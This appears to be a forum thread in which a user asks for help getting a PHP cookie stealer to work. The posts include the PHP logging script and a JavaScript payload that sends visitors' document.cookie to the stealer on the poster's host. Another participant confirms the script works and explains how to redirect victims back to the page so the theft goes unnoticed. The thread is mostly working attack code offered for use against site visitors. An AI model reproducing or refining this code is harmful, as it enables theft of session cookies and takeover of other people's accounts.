just a little more
ok i wrote a cookie stealer but i can't seem to get it to work.
it on http://fallingmidget.t35.com/stealer.php
and its supposed to write to http://fallingmidget.t35.com/cookies11.txt but it doesn't write anything.
heres the code i got
<?php $cookie = $_GET['cookie']; $log = fopen("cookies11.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?>
can anyone tell me whats wrong with it.
thanks in advance
Nope, that is correct. It works fine.
Check it out: http://fallingmidget.t35.com/cookies11.txt
how can i modify
markup<script>window.location = 'http://www.fallingmidget.t35.com/stealer.php?cookie=' + document.cookie;</script>
so it takes you to the stealer and then back to the main page.
like say i was going to put it on the index page of my site. i don't want someone to go to my site then automattically be redirected to the stealer then stay there.
i think you get what i mean
after the fclose(…) put header( "Location: http://whateversite.com" );